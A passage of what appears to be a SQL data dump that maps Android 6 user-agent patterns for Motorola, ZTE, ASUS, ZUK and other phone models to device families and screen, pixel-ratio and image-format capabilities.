Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1635-02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1662) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1663) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1706) AppleWebKit/* (KHTML, like Gecko) Chrome','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; XT1706) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_motorolax','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Y300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Y6 MAX 3D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Y6 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Y6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Y6C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; YD201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; YU5040) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; YU5530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z-ONE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z1c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z2131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z25) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z3c) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z404) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z406) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z718TL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z798BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z799VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z832) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z833) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z836BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z837VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z956) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z957) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z958) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z978) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z981) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z986U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z988) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZB500KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZB501KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZC551KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZC553KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZE520KL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE A2017G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE B2017G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A112) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A506) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A512) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A602) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A610C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE A910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE L7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE V0710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE V0720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE V0730) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE V7 LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE V7 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BLADE V7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE BV0720) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Blade A210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Blade A315) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Blade A462) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Blade A610) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Blade V6 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Blade V770) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE C2017) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE T620) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE Z10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE-Z831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZTE-Z832) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_zte','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZUK Z1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZUK Z2121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZUK Z2131) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ZUK Z2151) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Z_power) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Zun X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; arrowsM03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 